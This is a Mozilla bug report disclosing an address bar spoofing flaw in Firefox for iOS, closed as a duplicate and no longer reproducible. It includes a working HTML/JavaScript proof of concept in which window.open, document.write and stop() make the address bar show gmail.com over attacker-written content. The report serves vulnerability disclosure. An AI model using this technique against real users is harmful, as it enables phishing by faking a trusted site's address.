1268796 - Address Bar Spoof on Firefox For IOS

Status: RESOLVED DUPLICATE of bug 1263974

(Firefox for iOS :: General, defect)

Description

[xisigr]

Attachment: address bar spoof.jpg

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
Firefox for Android

Steps to reproduce:

IPhone:
Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) FxiOS/3.0 Mobile/13F61 Safari/601.1.4
IPAD:
Mozilla/5.0 (iPad; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) FxiOS/3.0 Mobile/13E238 Safari/601.1.46



Actual results:

Address bar spoofing


Expected results:

<h1><a href="https://www.gmail.com" target="foo" onclick="setTimeout('s()',100)">click me</a></h1>

<script>
function s() {
  var t = window.open('','foo');
  t.document.write("<h1>Address bar says https://www.gmail.com - this is NOT https://www.gmail.com</h1>");
  t.stop();
}
</script>
Online Demo：http://xisigr.com/test/spoof/firefox/1.html

Comment 1

[Daniel Veditz [:dveditz]]

Stefan: is this essentially a dupe of the other bug(s) we've gotten where the load is interrupted before we update the URL bar correctly?

Comment 2

[Brian Nicholson (:bnicholson)]

(In reply to Daniel Veditz [:dveditz] from comment #1)
> Stefan: is this essentially a dupe of the other bug(s) we've gotten where
> the load is interrupted before we update the URL bar correctly?

Yep, same mechanism (window.open with a null or invalid URL followed by document.write). No longer reproducible.